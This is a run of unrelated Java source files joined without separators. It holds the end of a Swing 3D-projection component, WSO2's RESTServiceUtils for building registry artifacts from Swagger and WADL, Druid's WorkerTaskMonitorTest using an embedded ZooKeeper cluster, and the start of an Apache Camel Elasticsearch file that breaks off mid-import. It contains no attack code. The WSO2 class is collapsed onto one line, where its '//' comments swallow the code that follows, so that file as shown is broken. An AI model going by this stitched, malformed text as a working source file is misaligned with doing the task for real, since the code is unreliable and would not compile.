     * the prism+grid origin, and returns the closed screen-space outline.
     */
    private Path2D projectShape(Shape shape, Matrix3 transform, double xOffset, double yOffset) {
        List<Vertex> vertexList = new ArrayList<Vertex>();
        for (Vertex vertex : shape.getVertices()) {
            vertexList.add(transform.transform(vertex));
        }
        Path2D path = new Path2D.Double();
        for (int i = 0; i < vertexList.size(); i++) {
            Vertex vertex = vertexList.get(i);
            vertex.setX(vertex.getX() + xOffset);
            vertex.setY(vertex.getY() + yOffset);
            if (i == 0) {
                path.moveTo(vertex.getX(), vertex.getY());
            } else {
                path.lineTo(vertex.getX(), vertex.getY());
            }
        }
        path.closePath();
        return path;
    }

    @Override
    public void mouseReleased(MouseEvent e) {
        if (e.getButton() == MouseEvent.BUTTON1) {
            this.mouseDown = false;
        }
    }

    @Override
    public void mouseClicked(MouseEvent arg0) {
    }

    @Override
    public void mouseEntered(MouseEvent arg0) {
    }

    @Override
    public void mouseExited(MouseEvent arg0) {
    }
}
/* * Copyright (c) 2015, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wso2.carbon.registry.extensions.handlers.utils; import com.google.gson.JsonArray; import com.google.gson.JsonElement; import com.google.gson.JsonObject; import org.apache.axiom.om.OMAbstractFactory; import org.apache.axiom.om.OMElement; import org.apache.axiom.om.OMFactory; import org.apache.axiom.om.OMNamespace; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.context.CarbonContext; import org.wso2.carbon.registry.core.Registry; import org.wso2.carbon.registry.core.RegistryConstants; import org.wso2.carbon.registry.core.Resource; import org.wso2.carbon.registry.core.ResourceImpl; import org.wso2.carbon.registry.core.config.RegistryContext; import org.wso2.carbon.registry.core.exceptions.RegistryException; import org.wso2.carbon.registry.core.jdbc.handlers.RequestContext; import org.wso2.carbon.registry.core.utils.RegistryUtils; import org.wso2.carbon.registry.extensions.services.Utils; import org.wso2.carbon.registry.extensions.utils.CommonConstants; import org.wso2.carbon.registry.extensions.utils.CommonUtil; import javax.xml.namespace.QName; import java.util.*; /** * This class contains static methods to generate REST Service registry artifact from the swagger doc added to the * Registry. 
*/ public class RESTServiceUtils { private static final Log log = LogFactory.getLog(RESTServiceUtils.class); private static final String OVERVIEW = "overview"; private static final String PROVIDER = "provider"; private static final String NAME = "name"; private static final String CONTEXT = "context"; private static final String VERSION = "version"; private static final String TRANSPORTS = "transports"; private static final String DESCRIPTION = "description"; private static final String URI_TEMPLATE = "uritemplate"; private static final String URL_PATTERN = "urlPattern"; private static final String AUTH_TYPE = "authType"; private static final String HTTP_VERB = "httpVerb"; private static final String ENDPOINT_URL = "endpointURL"; private static final String WADL = "wadl"; private static final String PATH_SEPERATOR = "/"; private static final String METHOD = "method"; private static final String PATH = "path"; private static final String RESOURCE = "resource"; private static OMFactory factory = OMAbstractFactory.getOMFactory(); private static OMNamespace namespace = factory.createOMNamespace(CommonConstants.SERVICE_ELEMENT_NAMESPACE, ""); private static String commonRestServiceLocation; private static String commonEndpointLocation; /** * Extracts the data from swagger and creates an REST Service registry artifact. * * @param swaggerDocObject swagger Json Object. * @param swaggerVersion swagger version. * @param resourceObjects swagger resource object list. * @return The API metadata * @throws RegistryException If swagger content is invalid. */ public static OMElement createRestServiceArtifact(JsonObject swaggerDocObject, String swaggerVersion, String endpointURL, List<JsonObject> resourceObjects) throws RegistryException { if(swaggerDocObject == null || swaggerVersion == null) { throw new IllegalArgumentException("Arguments are invalid. cannot create the REST service artifact. 
"); } OMElement data = factory.createOMElement(CommonConstants.SERVICE_ELEMENT_ROOT, namespace); OMElement overview = factory.createOMElement(OVERVIEW, namespace); OMElement provider = factory.createOMElement(PROVIDER, namespace); OMElement name = factory.createOMElement(NAME, namespace); OMElement context = factory.createOMElement(CONTEXT, namespace); OMElement apiVersion = factory.createOMElement(VERSION, namespace); OMElement endpoint = factory.createOMElement(ENDPOINT_URL, namespace); OMElement transports = factory.createOMElement(TRANSPORTS, namespace); OMElement description = factory.createOMElement(DESCRIPTION, namespace); List<OMElement> uriTemplates = null; JsonObject infoObject = swaggerDocObject.get(SwaggerConstants.INFO).getAsJsonObject(); //get api name. String apiName = getChildElementText(infoObject, SwaggerConstants.TITLE).replaceAll("\\s", ""); name.setText(apiName); context.setText("/" + apiName); //get api description. description.setText(getChildElementText(infoObject, SwaggerConstants.DESCRIPTION)); //get api provider. 
(Current logged in user) : Alternative - CurrentSession.getUser(); provider.setText(CarbonContext.getThreadLocalCarbonContext().getUsername()); endpoint.setText(endpointURL); if (SwaggerConstants.SWAGGER_VERSION_2.equals(swaggerVersion)) { apiVersion.setText(getChildElementText(infoObject, SwaggerConstants.VERSION)); transports.setText(getChildElementText(swaggerDocObject, SwaggerConstants.SCHEMES)); uriTemplates = createURITemplateFromSwagger2(swaggerDocObject); } else if (SwaggerConstants.SWAGGER_VERSION_12.equals(swaggerVersion)) { apiVersion.setText(getChildElementText(swaggerDocObject, SwaggerConstants.API_VERSION)); uriTemplates = createURITemplateFromSwagger12(resourceObjects); } overview.addChild(provider); overview.addChild(name); overview.addChild(context); overview.addChild(apiVersion); overview.addChild(transports); overview.addChild(description); overview.addChild(endpoint); data.addChild(overview); if (uriTemplates != null) { for (OMElement uriTemplate : uriTemplates) { data.addChild(uriTemplate); } } return data; } /** * Extracts the data from wadl and creates an REST Service registry artifact. * * @param wadlElement wadl content. * @param wadlName wadl name. * @param version wadl version. * @param wadlPath wadl path. * @return REST Service element. */ public static OMElement createRestServiceArtifact(OMElement wadlElement, String wadlName, String version, String wadlPath) { if(wadlElement == null) { throw new IllegalArgumentException("WADL content cannot be null." 
); } OMElement data = factory.createOMElement(CommonConstants.SERVICE_ELEMENT_ROOT, namespace); OMElement overview = factory.createOMElement(OVERVIEW, namespace); OMElement provider = factory.createOMElement(PROVIDER, namespace); OMElement name = factory.createOMElement(NAME, namespace); OMElement context = factory.createOMElement(CONTEXT, namespace); OMElement apiVersion = factory.createOMElement(VERSION, namespace); OMElement endpoint = factory.createOMElement(ENDPOINT_URL, namespace); OMElement transports = factory.createOMElement(TRANSPORTS, namespace); OMElement wadl = factory.createOMElement(WADL, namespace); List<OMElement> uriTemplates = null; provider.setText(CarbonContext.getThreadLocalCarbonContext().getUsername()); String serviceName = wadlName.contains(".") ? wadlName.substring(0, wadlName.lastIndexOf(".")) : wadlName; name.setText(serviceName); context.setText("/"+serviceName); apiVersion.setText(version); wadl.setText(wadlPath); OMNamespace wadlNamespace = wadlElement.getNamespace(); String wadlNamespaceURI = wadlNamespace.getNamespaceURI(); String wadlNamespacePrefix = wadlNamespace.getPrefix(); OMElement resourcesElement = wadlElement.getFirstChildWithName(new QName(wadlNamespaceURI, "resources", wadlNamespacePrefix)); if(resourcesElement != null) { String endpointUrl = resourcesElement.getAttributeValue(new QName("base")); endpoint.setText(endpointUrl); if(endpointUrl != null) { transports.setText(endpointUrl.substring(0, endpointUrl.indexOf("://"))); } uriTemplates = createURITemplateFromWADL(resourcesElement); } else { log.warn("WADL does not contains any resource paths. 
"); } overview.addChild(provider); overview.addChild(name); overview.addChild(context); overview.addChild(apiVersion); overview.addChild(transports); overview.addChild(wadl); overview.addChild(endpoint); data.addChild(overview); if (uriTemplates != null) { for (OMElement uriTemplate : uriTemplates) { data.addChild(uriTemplate); } } return data; } /** * Saves the REST Service registry artifact created from the imported swagger definition. * * @param requestContext information about current request. * @param data service artifact metadata. * @throws RegistryException If a failure occurs when adding the api to registry. */ public static String addServiceToRegistry(RequestContext requestContext, OMElement data) throws RegistryException { if(requestContext == null || data == null) { throw new IllegalArgumentException("Some or all of the arguments may be null. Cannot add the rest service to registry. "); } Registry registry = requestContext.getRegistry(); //Creating new resource. Resource serviceResource = new ResourceImpl(); //setting API media type. serviceResource.setMediaType(CommonConstants.REST_SERVICE_MEDIA_TYPE); serviceResource.setProperty(CommonConstants.SOURCE_PROPERTY, CommonConstants.SOURCE_AUTO); OMElement overview = data.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, OVERVIEW)); String serviceVersion = overview.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, VERSION)).getText(); String apiName = overview.getFirstChildWithName(new QName(CommonConstants.SERVICE_ELEMENT_NAMESPACE, NAME)).getText(); serviceVersion = (serviceVersion == null) ? CommonConstants.SERVICE_VERSION_DEFAULT_VALUE : serviceVersion; String serviceProvider = CarbonContext.getThreadLocalCarbonContext().getUsername(); String pathExpression = getRestServicePath(requestContext, data, apiName, serviceProvider); //set version property. 
serviceResource.setProperty(RegistryConstants.VERSION_PARAMETER_NAME, serviceVersion); //copy other property serviceResource.setProperties(copyProperties(requestContext)); //set content. serviceResource.setContent(RegistryUtils.encodeString(data.toString())); String resourceId = serviceResource.getUUID(); //set resource UUID resourceId = (resourceId == null) ? UUID.randomUUID().toString() : resourceId; serviceResource.setUUID(resourceId); String servicePath = getChrootedServiceLocation(requestContext.getRegistryContext()) + CarbonContext.getThreadLocalCarbonContext().getUsername() + RegistryConstants.PATH_SEPARATOR + apiName + RegistryConstants.PATH_SEPARATOR + serviceVersion + RegistryConstants.PATH_SEPARATOR + apiName + "-rest_service"; //saving the api resource to repository. registry.put(pathExpression, serviceResource); String defaultLifeCycle = CommonUtil.getDefaultLifecycle(registry, "restservice"); if (defaultLifeCycle != null && !defaultLifeCycle.isEmpty()) { registry.associateAspect(serviceResource.getId(), defaultLifeCycle); } if (log.isDebugEnabled()){ log.debug("REST Service created at " + pathExpression); } return pathExpression; } /** * Generate REST service path * @param requestContext Request Context * @param data REST Service content(OMElement) * @param serviceName REST Service name * @param serviceProvider Service Provider(current user) * @return Populated Path */ private static String getRestServicePath(RequestContext requestContext, OMElement data, String serviceName, String serviceProvider) { String pathExpression = Utils.getRxtService().getStoragePath(CommonConstants.REST_SERVICE_MEDIA_TYPE); pathExpression = CommonUtil.replaceExpressionOfPath(pathExpression, "name", serviceName); pathExpression = RegistryUtils.getAbsolutePath(requestContext.getRegistryContext(), CommonUtil .getPathFromPathExpression(pathExpression, data, requestContext.getResource().getProperties())); pathExpression = CommonUtil .getPathFromPathExpression(pathExpression, 
requestContext.getResource().getProperties(), null); pathExpression = RegistryUtils.getAbsolutePath(requestContext.getRegistryContext(), CommonUtil .replaceExpressionOfPath(pathExpression, "provider", serviceProvider)); return CommonUtil.getRegistryPath(requestContext.getRegistry().getRegistryContext(), pathExpression); } /** * Adds the service endpoint element to the registry. * * @param requestContext current request information. * @param endpointElement endpoint metadata element. * @param endpointPath endpoint location. * @return The resource path of the endpoint. * @throws RegistryException If fails to add the endpoint to the registry. */ public static String addEndpointToRegistry(RequestContext requestContext, OMElement endpointElement, String endpointPath) throws RegistryException { if(requestContext == null || endpointElement == null || endpointPath == null) { throw new IllegalArgumentException("Some or all of the arguments may be null. Cannot add the endpoint to registry. "); } endpointPath = getEndpointPath(requestContext, endpointElement, endpointPath); Registry registry = requestContext.getRegistry(); //Creating new resource. Resource endpointResource = new ResourceImpl(); //setting endpoint media type. endpointResource.setMediaType(CommonConstants.ENDPOINT_MEDIA_TYPE); //set content. endpointResource.setContent(RegistryUtils.encodeString(endpointElement.toString())); //copy other property endpointResource.setProperties(copyProperties(requestContext)); //set path //endpointPath = getChrootedEndpointLocation(requestContext.getRegistryContext()) + endpointPath; String resourceId = endpointResource.getUUID(); //set resource UUID resourceId = (resourceId == null) ? UUID.randomUUID().toString() : resourceId; endpointResource.setUUID(resourceId); //saving the api resource to repository. 
registry.put(endpointPath, endpointResource); if (log.isDebugEnabled()){ log.debug("Endpoint created at " + endpointPath); } return endpointPath; } /** * This method used to generate endpoint path * @param requestContext Request Context * @param endpointElement Endpoint XML element * @param endpointPath Current endpoint path * @return Updated endpoint path; */ private static String getEndpointPath(RequestContext requestContext, OMElement endpointElement, String endpointPath) { String pathExpression = Utils.getRxtService().getStoragePath(CommonConstants.ENDPOINT_MEDIA_TYPE); pathExpression = CommonUtil.getPathFromPathExpression(pathExpression, endpointElement, requestContext.getResource().getProperties()); endpointPath = CommonUtil.replaceExpressionOfPath(pathExpression, "name", endpointPath); return CommonUtil.getRegistryPath(requestContext.getRegistry().getRegistryContext(), endpointPath); } /** * Returns a Json element as a string * * @param object json Object * @param key element key * @return Element value */ private static String getChildElementText(JsonObject object, String key) { JsonElement element = object.get(key); if (element != null) { return object.get(key).getAsString(); } return null; } /** * Contains the logic to create URITemplate XML Element from the swagger 1.2 resource. * * @param resourceObjects the path resource documents. * @return URITemplate element. 
*/ private static List<OMElement> createURITemplateFromSwagger12(List<JsonObject> resourceObjects) { List<OMElement> uriTemplates = new ArrayList<>(); for (JsonObject resourceObject : resourceObjects) { JsonArray pathResources = resourceObject.getAsJsonArray(SwaggerConstants.APIS); //Iterating through the Paths for (JsonElement pathResource : pathResources) { JsonObject path = pathResource.getAsJsonObject(); String pathText = path.get(SwaggerConstants.PATH).getAsString(); JsonArray methods = path.getAsJsonArray(SwaggerConstants.OPERATIONS); //Iterating through HTTP methods (Actions) for (JsonElement method : methods) { JsonObject methodObj = method.getAsJsonObject(); OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(pathText); httpVerbElement.setText(methodObj.get(SwaggerConstants.METHOD).getAsString()); //Adding urlPattern element to URITemplate element. uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } } } return uriTemplates; } /** * Contains the logic to create URITemplate XML Element from the swagger 2.0 resource. * * @param swaggerDocObject swagger document * @return URITemplate element. 
*/ private static List<OMElement> createURITemplateFromSwagger2(JsonObject swaggerDocObject) { List<OMElement> uriTemplates = new ArrayList<>(); JsonObject paths = swaggerDocObject.get(SwaggerConstants.PATHS).getAsJsonObject(); Set<Map.Entry<String, JsonElement>> pathSet = paths.entrySet(); for (Map.Entry path : pathSet) { JsonObject urlPattern = ((JsonElement) path.getValue()).getAsJsonObject(); String pathText = path.getKey().toString(); Set<Map.Entry<String, JsonElement>> operationSet = urlPattern.entrySet(); for (Map.Entry operationEntry : operationSet) { OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(pathText); httpVerbElement.setText(operationEntry.getKey().toString()); uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } } return uriTemplates; } /** * Contains the logic to create URITemplate XML Element from wadl resource. * * @param resourcesElement wadl document * @return URITemplate element. */ private static List<OMElement> createURITemplateFromWADL(OMElement resourcesElement) { List<OMElement> uriTemplates = new ArrayList<>(); Iterator resources = resourcesElement.getChildrenWithLocalName(RESOURCE); while(resources.hasNext()) { OMElement resource = (OMElement) resources.next(); String path = resource.getAttributeValue(new QName(PATH)); path = path.endsWith(PATH_SEPERATOR) ? 
path : path + PATH_SEPERATOR; Iterator methods = resource.getChildrenWithLocalName(METHOD); uriTemplates.addAll(getUriTemplateElementFromMethods(path, methods)); Iterator subResources = resource.getChildrenWithLocalName(RESOURCE); while (subResources.hasNext()) { OMElement subResource = (OMElement) subResources.next(); String subPath = subResource.getAttributeValue(new QName(PATH)); subPath = subPath.startsWith(PATH_SEPERATOR) ? subPath.substring(1) : subPath; Iterator subMethods = resource.getChildrenWithLocalName(METHOD); uriTemplates.addAll(getUriTemplateElementFromMethods(subPath, subMethods)); } } return uriTemplates; } /** * Creates uri template elements for HTTP action verbs. * * @param resourcePath resource path. * @param methods http verbs. * @return Uri template element list. */ private static List<OMElement> getUriTemplateElementFromMethods(String resourcePath, Iterator methods) { List<OMElement> uriTemplates = new ArrayList<>(); while(methods.hasNext()) { OMElement method = (OMElement) methods.next(); String httpVerb = method.getAttributeValue(new QName(NAME)); OMElement uriTemplateElement = factory.createOMElement(URI_TEMPLATE, namespace); OMElement urlPatternElement = factory.createOMElement(URL_PATTERN, namespace); OMElement httpVerbElement = factory.createOMElement(HTTP_VERB, namespace); OMElement authTypeElement = factory.createOMElement(AUTH_TYPE, namespace); urlPatternElement.setText(resourcePath); httpVerbElement.setText(httpVerb); uriTemplateElement.addChild(urlPatternElement); uriTemplateElement.addChild(httpVerbElement); uriTemplateElement.addChild(authTypeElement); uriTemplates.add(uriTemplateElement); } return uriTemplates; } /** * Returns the root location of the API. * * @param registryContext registry context * @return The root location of the API artifact. 
*/ private static String getChrootedServiceLocation(RegistryContext registryContext) { return RegistryUtils.getAbsolutePath(registryContext, RegistryConstants.GOVERNANCE_REGISTRY_BASE_PATH + commonRestServiceLocation); } /** * Returns the root location of the endpoint. * * @param registryContext registry context * @return The root location of the Endpoint artifact. */ private static String getChrootedEndpointLocation(RegistryContext registryContext) { return RegistryUtils.getAbsolutePath(registryContext, RegistryConstants.GOVERNANCE_REGISTRY_BASE_PATH + commonEndpointLocation); } /** * Set the restServiceLocation. * * @param restServiceLocation the restServiceLocation */ public static void setCommonRestServiceLocation(String restServiceLocation) { RESTServiceUtils.commonRestServiceLocation = restServiceLocation; } /** * Set the endpointLocation. * * @param endpointLocation the endpointLocation */ public static void setCommonEndpointLocation(String endpointLocation) { RESTServiceUtils.commonEndpointLocation = endpointLocation; } /** * This method used to extract properties from request context * @param requestContext Request Context * @return Extracted Properties */ private static Properties copyProperties(RequestContext requestContext) { Properties properties = requestContext.getResource().getProperties(); Properties copiedProperties = new Properties(); if (properties != null) { List<String> linkProperties = Arrays.asList( RegistryConstants.REGISTRY_LINK, RegistryConstants.REGISTRY_USER, RegistryConstants.REGISTRY_MOUNT, RegistryConstants.REGISTRY_AUTHOR, RegistryConstants.REGISTRY_MOUNT_POINT, RegistryConstants.REGISTRY_TARGET_POINT, RegistryConstants.REGISTRY_ACTUAL_PATH, RegistryConstants.REGISTRY_REAL_PATH); for (Map.Entry<Object, Object> e : properties.entrySet()) { String key = (String) e.getKey(); if (!linkProperties.contains(key) && !(key.startsWith("resource") || key.startsWith("registry"))) { copiedProperties.put(key, (List<String>) e.getValue()); } } } 
return copiedProperties; } }
/*
 * Licensed to Metamarkets Group Inc. (Metamarkets) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. Metamarkets licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

package io.druid.indexing.worker;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.NamedType;
import com.google.common.base.Joiner;
import com.google.common.collect.Lists;
import com.google.common.io.Files;
import io.druid.curator.PotentiallyGzippedCompressionProvider;
import io.druid.indexing.common.IndexingServiceCondition;
import io.druid.indexing.common.SegmentLoaderFactory;
import io.druid.indexing.common.TaskStatus;
import io.druid.indexing.common.TaskToolboxFactory;
import io.druid.indexing.common.TestMergeTask;
import io.druid.indexing.common.TestRealtimeTask;
import io.druid.indexing.common.TestUtils;
import io.druid.indexing.common.actions.TaskActionClient;
import io.druid.indexing.common.actions.TaskActionClientFactory;
import io.druid.indexing.common.config.TaskConfig;
import io.druid.indexing.common.task.Task;
import io.druid.indexing.overlord.TestRemoteTaskRunnerConfig;
import io.druid.indexing.overlord.ThreadPoolTaskRunner;
import io.druid.indexing.worker.config.WorkerConfig;
import io.druid.segment.IndexIO;
import io.druid.segment.IndexMerger;
import io.druid.segment.loading.SegmentLoaderConfig;
import io.druid.segment.loading.SegmentLoaderLocalCacheManager;
import io.druid.segment.loading.StorageLocationConfig;
import io.druid.segment.realtime.plumber.SegmentHandoffNotifierFactory;
import io.druid.server.initialization.IndexerZkConfig;
import io.druid.server.initialization.ZkPathsConfig;
import io.druid.server.metrics.NoopServiceEmitter;
import org.apache.curator.framework.CuratorFramework;
import org.apache.curator.framework.CuratorFrameworkFactory;
import org.apache.curator.retry.ExponentialBackoffRetry;
import org.apache.curator.test.TestingCluster;
import org.easymock.EasyMock;
import org.joda.time.Period;
import org.junit.After;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;

import java.util.List;

/**
 * Integration-style test for {@link WorkerTaskMonitor}: runs an embedded ZooKeeper
 * cluster ({@link TestingCluster}), announces tasks under the worker's task path, and
 * verifies that the monitor picks them up and publishes status announcements.
 */
public class WorkerTaskMonitorTest
{
  private static final Joiner joiner = Joiner.on("/");
  // Base ZK chroot for the test, plus the derived task-assignment and status paths.
  private static final String basePath = "/test/druid";
  private static final String tasksPath = String.format("%s/indexer/tasks/worker", basePath);
  private static final String statusPath = String.format("%s/indexer/status/worker", basePath);

  private TestingCluster testingCluster;
  private CuratorFramework cf;
  private WorkerCuratorCoordinator workerCuratorCoordinator;
  private WorkerTaskMonitor workerTaskMonitor;
  private TestMergeTask task;
  private Worker worker;
  private ObjectMapper jsonMapper;
  private IndexMerger indexMerger;
  private IndexIO indexIO;

  public WorkerTaskMonitorTest()
  {
    // TestUtils supplies a pre-configured ObjectMapper and index tooling shared by tests.
    TestUtils testUtils = new TestUtils();
    jsonMapper = testUtils.getTestObjectMapper();
    indexMerger = testUtils.getTestIndexMerger();
    indexIO = testUtils.getTestIndexIO();
  }

  @Before
  public void setUp() throws Exception
  {
    // Single-node embedded ZK cluster; the Curator client talks to it with fast retries.
    testingCluster = new TestingCluster(1);
    testingCluster.start();

    cf = CuratorFrameworkFactory.builder()
                                .connectString(testingCluster.getConnectString())
                                .retryPolicy(new ExponentialBackoffRetry(1, 10))
                                .compressionProvider(new PotentiallyGzippedCompressionProvider(false))
                                .build();
    cf.start();
    cf.create().creatingParentsIfNeeded().forPath(basePath);

    worker = new Worker(
        "worker",
        "localhost",
        3,
        "0"
    );

    // Coordinator that registers the worker in ZK under basePath.
    workerCuratorCoordinator = new WorkerCuratorCoordinator(
        jsonMapper,
        new IndexerZkConfig(
            new ZkPathsConfig()
            {
              @Override
              public String getBase()
              {
                return basePath;
              }
            }, null, null, null, null, null
        ),
        new TestRemoteTaskRunnerConfig(new Period("PT1S")),
        cf,
        worker
    );
    workerCuratorCoordinator.start();

    // Start a task monitor
    workerTaskMonitor = createTaskMonitor();
    // Register the test task subtypes so the monitor can deserialize them from ZK.
    jsonMapper.registerSubtypes(new NamedType(TestMergeTask.class, "test"));
    jsonMapper.registerSubtypes(new NamedType(TestRealtimeTask.class, "test_realtime"));
    workerTaskMonitor.start();

    task = TestMergeTask.createDummyTask("test");
  }

  /**
   * Builds a WorkerTaskMonitor with single-task capacity, nice-mocked task-action
   * plumbing, and a temp-dir task config. Also used to simulate a restart.
   */
  private WorkerTaskMonitor createTaskMonitor()
  {
    final TaskConfig taskConfig = new TaskConfig(
        Files.createTempDir().toString(),
        null,
        null,
        0,
        null,
        null,
        null
    );
    TaskActionClientFactory taskActionClientFactory = EasyMock.createNiceMock(TaskActionClientFactory.class);
    TaskActionClient taskActionClient = EasyMock.createNiceMock(TaskActionClient.class);
    EasyMock.expect(taskActionClientFactory.create(EasyMock.<Task>anyObject())).andReturn(taskActionClient).anyTimes();
    SegmentHandoffNotifierFactory notifierFactory = EasyMock.createNiceMock(SegmentHandoffNotifierFactory.class);
    EasyMock.replay(taskActionClientFactory, taskActionClient, notifierFactory);
    return new WorkerTaskMonitor(
        jsonMapper,
        cf,
        workerCuratorCoordinator,
        new ThreadPoolTaskRunner(
            new TaskToolboxFactory(
                taskConfig,
                taskActionClientFactory,
                null, null, null, null, null, null, notifierFactory, null, null, null,
                new SegmentLoaderFactory(
                    new SegmentLoaderLocalCacheManager(
                        null,
                        new SegmentLoaderConfig()
                        {
                          @Override
                          public List<StorageLocationConfig> getLocations()
                          {
                            return Lists.newArrayList();
                          }
                        }
                        , jsonMapper
                    )
                ),
                jsonMapper,
                indexMerger,
                indexIO,
                null,
                null
            ),
            taskConfig,
            new NoopServiceEmitter()
        ),
        new WorkerConfig().setCapacity(1)
    );
  }

  @After
  public void tearDown() throws Exception
  {
    workerTaskMonitor.stop();
    cf.close();
    testingCluster.stop();
  }

  /**
   * Announcing a task under tasksPath should make the monitor consume (delete) the
   * task node, publish a status node, and report the task as RUNNING.
   */
  @Test
  public void testRunTask() throws Exception
  {
    cf.create()
      .creatingParentsIfNeeded()
      .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task));

    // Wait until the monitor has picked up and removed the task-assignment node.
    Assert.assertTrue(
        TestUtils.conditionValid(
            new IndexingServiceCondition()
            {
              @Override
              public boolean isValid()
              {
                try {
                  return cf.checkExists().forPath(joiner.join(tasksPath, task.getId())) == null;
                }
                catch (Exception e) {
                  return false;
                }
              }
            }
        )
    );

    // Wait until a status node has been published for the task.
    Assert.assertTrue(
        TestUtils.conditionValid(
            new IndexingServiceCondition()
            {
              @Override
              public boolean isValid()
              {
                try {
                  return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null;
                }
                catch (Exception e) {
                  return false;
                }
              }
            }
        )
    );

    TaskAnnouncement taskAnnouncement = jsonMapper.readValue(
        cf.getData().forPath(joiner.join(statusPath, task.getId())), TaskAnnouncement.class
    );

    Assert.assertEquals(task.getId(), taskAnnouncement.getTaskStatus().getId());
    Assert.assertEquals(TaskStatus.Status.RUNNING, taskAnnouncement.getTaskStatus().getStatusCode());
  }

  /**
   * The coordinator's getAnnouncements() should reflect the single running task.
   */
  @Test
  public void testGetAnnouncements() throws Exception
  {
    cf.create()
      .creatingParentsIfNeeded()
      .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task));

    // Wait for the status node to appear before querying announcements.
    Assert.assertTrue(
        TestUtils.conditionValid(
            new IndexingServiceCondition()
            {
              @Override
              public boolean isValid()
              {
                try {
                  return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null;
                }
                catch (Exception e) {
                  return false;
                }
              }
            }
        )
    );

    List<TaskAnnouncement> announcements = workerCuratorCoordinator.getAnnouncements();
    Assert.assertEquals(1, announcements.size());
    Assert.assertEquals(task.getId(), announcements.get(0).getTaskStatus().getId());
    Assert.assertEquals(TaskStatus.Status.RUNNING, announcements.get(0).getTaskStatus().getStatusCode());
  }

  /**
   * After a simulated monitor restart, a previously-running task's stale status
   * should be cleaned up and reported as FAILED.
   */
  @Test
  public void testRestartCleansOldStatus() throws Exception
  {
    cf.create()
      .creatingParentsIfNeeded()
      .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task));

    // Wait for the status node to appear before restarting.
    Assert.assertTrue(
        TestUtils.conditionValid(
            new IndexingServiceCondition()
            {
              @Override
              public boolean isValid()
              {
                try {
                  return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null;
                }
                catch (Exception e) {
                  return false;
                }
              }
            }
        )
    );

    // simulate node restart
    workerTaskMonitor.stop();
    workerTaskMonitor = createTaskMonitor();
    workerTaskMonitor.start();

    List<TaskAnnouncement> announcements = workerCuratorCoordinator.getAnnouncements();
    Assert.assertEquals(1, announcements.size());
    Assert.assertEquals(task.getId(), announcements.get(0).getTaskStatus().getId());
    Assert.assertEquals(TaskStatus.Status.FAILED, announcements.get(0).getTaskStatus().getStatusCode());
  }

  /**
   * Status nodes must be PERSISTENT (survive session loss), not ephemeral.
   */
  @Test
  public void testStatusAnnouncementsArePersistent() throws Exception
  {
    cf.create()
      .creatingParentsIfNeeded()
      .forPath(joiner.join(tasksPath, task.getId()), jsonMapper.writeValueAsBytes(task));

    // Wait for the status node to appear.
    Assert.assertTrue(
        TestUtils.conditionValid(
            new IndexingServiceCondition()
            {
              @Override
              public boolean isValid()
              {
                try {
                  return cf.checkExists().forPath(joiner.join(statusPath, task.getId())) != null;
                }
                catch (Exception e) {
                  return false;
                }
              }
            }
        )
    );
    // ephemeral owner is 0 when the created node is PERSISTENT
    Assert.assertEquals(0, cf.checkExists().forPath(joiner.join(statusPath, task.getId())).getEphemeralOwner());
  }
}
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.component.elasticsearch; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import org.apache.camel.builder.RouteBuilder; import org.elasticsearch.action.delete.DeleteRequest; import org.elasticsearch.action.delete.DeleteResponse; import org.elasticsearch.action.get.GetRequest; import org.elasticsearch.action.get.GetResponse; import org.elasticsearch.action.get.MultiGetItemResponse; import 